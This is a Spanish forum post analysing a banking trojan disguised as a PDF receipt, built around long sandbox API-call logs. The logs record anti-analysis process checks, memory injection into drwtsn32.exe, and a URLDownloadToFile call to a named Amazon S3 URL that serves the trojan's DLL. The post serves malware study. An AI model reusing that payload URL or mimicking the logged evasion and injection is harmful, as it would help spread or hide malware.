LoadLibrary(c:\windows\apppatch\acgenral.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(kernel32.dll) [c:\windows\system32\dwwin.exe]
VirtualQueryEx(c:\windows\system32\dwwin.exe) [c:\windows\system32\dwwin.exe]
CreateMutex(SHIMLIB_LOG_MUTEX) [c:\windows\system32\dwwin.exe]
LoadLibrary(winmm.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msacm32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(userenv.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(uxtheme.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(lz32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(lz32.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(Kernel32) [c:\windows\system32\dwwin.exe]
GetModuleHandle(LPK.DLL) [c:\windows\system32\dwwin.exe]
OpenProcess(dwwin.exe) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\system32\dwwin.exe]
GetModuleHandle(USER32) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\system32\dwwin.exe]
OpenProcessToken(C:\WINDOWS\system32\dwwin.exe) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\system32\dwwin.exe]
LoadLibrary(imm32.dll) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\system32\dwwin.exe]
ResumeThread() [c:\windows\system32\dwwin.exe]
GetModuleHandle(Advapi32.dll) [c:\windows\system32\dwwin.exe]
CreateEvent(DINPUTWINMM) [c:\windows\system32\dwwin.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\windows\system32\dwwin.exe]
IsDebuggerPresent() [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\UxTheme.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(riched20.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(shfolder.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\SHELL32.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\shfolder.dll) [c:\windows\system32\dwwin.exe]
BitBlt() [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\windows\system32\dwwin.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\system32\dwwin.exe]
SetTimer(20996) [c:\windows\system32\dwwin.exe]
FreeLibrary() [c:\windows\system32\dwwin.exe]
CreateFile(C:\DOCUME~1\r32\CONFIG~1\Temp\597A56.dmp) [c:\windows\system32\dwwin.exe]
GetModuleHandle(NTDLL.DLL) [c:\windows\system32\dwwin.exe]
LoadLibrary(psapi.dll) [c:\windows\system32\dwwin.exe]
OpenProcess(HxD.exe) [c:\windows\system32\dwwin.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\windows\system32\dwwin.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPTHREAD,964) [c:\windows\system32\dwwin.exe]
QuerySystemInformation() [c:\windows\system32\dwwin.exe]
SuspendThread(1808) [c:\windows\system32\dwwin.exe]
SuspendThread(1800) [c:\windows\system32\dwwin.exe]
SuspendThread(1796) [c:\windows\system32\dwwin.exe]
SuspendThread(1792) [c:\windows\system32\dwwin.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPALL,964) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\ntdll.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\ntdll.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\USER32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\GDI32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\rpcrt4.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\RPCRT4.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\secur32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\Secur32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\OLEAUT32.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msvcrt.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\ole32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\VERSION.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\SHLWAPI.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\WININET.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\Normaliz.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\URLMON.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\iertutil.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\WINMM.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\MSCTF.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\PSAPI.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\MSACM32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\USERENV.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(ntdll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\3082\dwintl.dll) [c:\windows\system32\dwwin.exe]
InternetGetConnectedState() [c:\windows\system32\dwwin.exe]
GetUserName() [c:\windows\system32\dwwin.exe]
OpenMutex(Local\_!MSFTHISTORY!_) [c:\windows\system32\dwwin.exe]
GetComputerName() [c:\windows\system32\dwwin.exe]
CreateMutex(Local\_!MSFTHISTORY!_) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\windows\system32\dwwin.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\windows\system32\dwwin.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\c:!documents and settings!r32!cookies!) [c:\windows\system32\dwwin.exe]
CreateMutex(Local\c:!documents and settings!r32!cookies!) [c:\windows\system32\dwwin.exe]
CreateFile(C:\Documents and Settings\r32\Cookies\index.dat) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\windows\system32\dwwin.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\windows\system32\dwwin.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\WininetStartupMutex) [c:\windows\system32\dwwin.exe]
LoadLibrary(ws2_32) [c:\windows\system32\dwwin.exe]
LoadLibrary(ws2_32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(ws2help.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(shlwapi.dll) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\WininetConnectionMutex) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\WininetProxyRegistryMutex) [c:\windows\system32\dwwin.exe]
LoadLibrary(rasapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(rasman.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(netapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(tapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(rtutils.dll) [c:\windows\system32\dwwin.exe]
CreateMutex(RasPbFile) [c:\windows\system32\dwwin.exe]
OpenMutex(RasPbFile) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\RASAPI32.dll) [c:\windows\system32\dwwin.exe]
RasEnumEntries() [c:\windows\system32\dwwin.exe]
OpenSCManager((null),(null)) [c:\windows\system32\dwwin.exe]
OpenService(RASMAN) [c:\windows\system32\dwwin.exe]
LoadLibrary(msapsspc.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msvcrt40.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msapsspc.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(schannel.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(crypt32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msasn1.dll) [c:\windows\system32\dwwin.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\schannel.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(digest.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\digest.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msnsspc.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msnsspc.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\msv1_0.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(cryptdll.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(iphlpapi.dll) [c:\windows\system32\dwwin.exe]
lstrcmpi(COMPUTERNAME,TEMP) [c:\windows\system32\dwwin.exe]
lstrcmpi(COMPUTERNAME,TMP) [c:\windows\system32\dwwin.exe]
OpenService(Sens) [c:\windows\system32\dwwin.exe]
LoadLibrary(sensapi.dll) [c:\windows\system32\dwwin.exe]
OpenProcess(ctfmon.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(SbieCtrl.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(explorer.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(u1210.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(wireshark.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(sniff_hit.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(iexplore.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(firefox.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(VBoxTray.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(procexp.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(BSA.EXE) [c:\windows\system32\dwwin.exe]
OpenProcess(XueTr.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(dumpcap.exe) [c:\windows\system32\dwwin.exe]
GetSystemDefaultLangID() [c:\windows\system32\dwwin.exe]
SetWindowPos(20994,TOPMOST) [c:\windows\system32\dwwin.exe]
GetForegroundWindow() [c:\windows\system32\dwwin.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\windows\system32\dwwin.exe]
OpenProcess(csrss.exe) [c:\windows\system32\dwwin.exe]
CreateMutex(MSCTF.Shared.MUTEX.EBH) [c:\windows\system32\dwwin.exe]
GetModuleHandle(ole32.dll) [c:\windows\system32\dwwin.exe]
DeleteFile(C:\DOCUME~1\r32\CONFIG~1\Temp\597A56.dmp) [c:\windows\system32\dwwin.exe]
DeleteFile(C:\DOCUME~1\r32\CONFIG~1\Temp\74b4_appcompat.txt) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\3082\dwintl.dll) [c:\windows\system32\dwwin.exe]
ExitProcess(0) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\rasman.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\rtutils.dll) [c:\windows\system32\dwwin.exe]
VirtualAllocEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\drwtsn32.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcess(drwtsn32.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
WriteProcessMemory(c:\windows\system32\drwtsn32.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\drwtsn32.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
Executing: c:\windows\system32\drwtsn32.exe
LoadLibrary(msvcrt.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(advapi32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(kernel32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(gdi32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(user32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(dbgeng.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(dbghelp.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(version.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(shimeng.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(c:\windows\apppatch\acgenral.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(kernel32.dll) [c:\windows\system32\drwtsn32.exe]
VirtualQueryEx(c:\windows\system32\drwtsn32.exe) [c:\windows\system32\drwtsn32.exe]
CreateMutex(SHIMLIB_LOG_MUTEX) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(winmm.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(ole32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(oleaut32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(msacm32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(shell32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(shlwapi.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(userenv.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(uxtheme.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(lz32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(lz32.dll) [c:\windows\system32\drwtsn32.exe]
CreateEvent(DINPUTWINMM) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(Kernel32) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(comctl32.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(EXPLORER.EXE) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\system32\drwtsn32.exe]
880  Seguridad Informática / Análisis y Diseño de Malware / Troyano bancario II (diferente configuración). en: 16 Febrero 2013, 14:34 pm
Del mismo contacto de correo recibo otra muestra, actúa de forma diferente y descarga una buena batería de archivos.
En esta ocasión analicé el ejecutable mediante "Buster Sandbox".

URL: Pedir por MP.

Análisis online:

Comprovante.pdf.exe:
Virutotal: https://www.virustotal.com/file/a8dd1f76473cb69e7012964a5d723cb81014a13413df572735c7ae28b9e297cd/analysis/1360255230/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1a9a78b746cd486e4adb6aa28bdf02761&call=first

Archivos descargados:

jjca.dll:
Virutotal: https://www.virustotal.com/file/fa3651cfcd2aca6c7303ef8017986669465b724dc96ceaddcb249f66b487d420/analysis/1360254397/
Anubis: http://anubis.iseclab.org/?action=result&task_id=18c69386fee0475e4d56e22cb9bc33ac6

jsob.exe:
Virutotal: https://www.virustotal.com/file/d4ae23bf307150d9fd664eaac06bcce9d2101d946089a506b25f3f84d8248a8e/analysis/1360254575/
Anubis:

jsobs.exe:
Virutotal: https://www.virustotal.com/file/e914bda041273705403f2a968f557f67053b609daae77ca37c05f97d922a9261/analysis/1360254739/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1d19bec75e40ba5e461ef3b2548210e08

Projeto.exe:
Virutotal: https://www.virustotal.com/file/b727103a389dad4ab9e773906e898c30e50b0f0191a8299b27afaefca853f49e/analysis/1360254942/
Anubis: http://anubis.iseclab.org/?action=result&task_id=161f701d97b086d7421afd1ae0c2ba446

winsa64.exe:
Virutotal: https://www.virustotal.com/file/b727103a389dad4ab9e773906e898c30e50b0f0191a8299b27afaefca853f49e/analysis/1360255019/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1abaf0d0a6553c1e4bda858417f3f38f7&call=first

Compresión y compilado:





Ejecución de Comprovante.pdf.exe:

Código:
Executing: c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
VirtualQueryEx(c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcessToken(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
IsDebuggerPresent() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
BitBlt() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(b01a0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(13020c) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1001c4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(Pm.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetForegroundWindow() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1401a8) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetComputerName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\URLMON.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ResumeThread() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetSetOption() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetUserName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(secur32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
